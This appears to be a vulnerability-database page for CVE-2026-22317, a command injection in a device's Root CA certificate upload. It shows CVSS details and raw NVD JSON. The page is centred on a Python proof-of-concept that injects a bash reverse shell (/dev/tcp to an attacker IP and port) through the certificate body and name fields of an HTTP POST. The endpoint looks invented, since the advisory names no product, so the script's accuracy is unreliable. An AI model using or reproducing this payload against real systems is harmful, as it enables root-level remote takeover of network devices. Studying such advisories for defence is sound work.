Security Vulnerability Report
中文
CVE-2026-22317 CVSS 7.2 HIGH

CVE-2026-22317

Published: 2026-03-18 08:16:28
Last Modified: 2026-03-18 14:52:44
Source: [email protected]

Description

A command injection vulnerability in the device’s Root CA certificate transfer workflow allows a high-privileged attacker to send crafted HTTP POST requests that result in arbitrary command execution on the underlying Linux OS with root privileges.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

受影响设备固件版本 < 修复版本
具体版本信息需参考厂商官方公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22317 PoC - Root CA Certificate Transfer Command Injection # Target: Network device with vulnerable Root CA certificate transfer workflow def exploit(target_url, attacker_ip, attacker_port): """ Exploit CVE-2026-22317 by injecting command via certificate transfer workflow """ # Construct malicious payload for reverse shell payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;" # Target endpoint for Root CA certificate transfer endpoint = f"{target_url.rstrip('/')}/api/v1/certificates/root-ca/upload" # Craft malicious certificate request files = { 'certificate': ('cert.pem', f'-----BEGIN CERTIFICATE-----\n{payload}\n-----END CERTIFICATE-----', 'application/x-pem-file') } data = { 'cert_name': f'test{payload}', 'action': 'transfer' } headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-22317-PoC)', 'Authorization': 'Bearer <HIGH_PRIVILEGE_TOKEN>' } try: print(f"[*] Sending exploit payload to {endpoint}") response = requests.post(endpoint, files=files, data=data, headers=headers, timeout=10, verify=False) print(f"[*] Response Status: {response.status_code}") print(f"[*] Check your listener on {attacker_ip}:{attacker_port}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>") print(f"Example: python {sys.argv[0]} https://192.168.1.1 10.0.0.1 4444") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22317", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:27.580", "lastModified": "2026-03-18T14:52:44.227", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability in the device’s Root CA certificate transfer workflow allows a high-privileged attacker to send crafted HTTP POST requests that result in arbitrary command execution on the underlying Linux OS with root privileges."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos en el flujo de trabajo de transferencia de certificados de CA raíz del dispositivo permite a un atacante con altos privilegios enviar solicitudes HTTP POST manipuladas que resultan en la ejecución arbitraria de comandos en el sistema operativo Linux subyacente con privilegios de root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.